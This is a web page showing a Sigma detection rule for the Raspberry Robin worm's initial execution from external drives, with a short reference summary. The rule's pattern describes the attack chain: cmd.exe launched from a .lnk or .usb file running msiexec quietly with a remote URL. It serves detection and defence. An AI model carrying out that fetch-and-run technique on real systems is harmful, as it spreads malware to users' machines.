Raspberry Robin initial execution from external drive

Aug 10, 2024 · attack.execution attack.T1059.001 ·

Detects execution from the external drive using cmd

Sigma rule (View on GitHub)

 1title: Raspberry Robin initial execution from external drive
 2id: 2c6bea3a-ef58-4f2e-a775-4928f6b7c58a
 3description: Detects execution from the external drive using cmd
 4status: experimental
 5date: 2022/05/6
 6author: \@kostastsale
 7references:
 8    - https://redcanary.com/blog/raspberry-robin/
 9logsource:
10    category: process_creation
11    product: windows
12detection:
13    selection1:
14        ParentImage|endswith:
15            - '*\cmd.exe'
16        ParentCommandLine|contains:
17            - '/r'
18        Image|endswith:
19            - '*\msiexec.exe'
20        CommandLine|contains:
21            - '/q'
22            - '-q'
23    selection2:
24        CommandLine|contains:
25            - 'http:'
26            - 'https:'
27        ParentCommandLine|endswith:
28            - '.usb'
29            - '.ico'
30            - '.lnk'
31            - '.bin'
32            - '.sv'
33            - '.lo'
34    condition: selection1 and selection2
35falsepositives:
36    - Unlikely
37level: high
38tags:
39    - attack.execution
40    - attack.T1059.001

References

Raspberry Robin gets the worm early

Raspberry Robin is a worm spread by external drives that leverages Windows Installer to download a malicious DLL.

Read More

Raspberry Robin initial execution from external drive

Sigma rule (View on GitHub)

References

Raspberry Robin gets the worm early

Related rules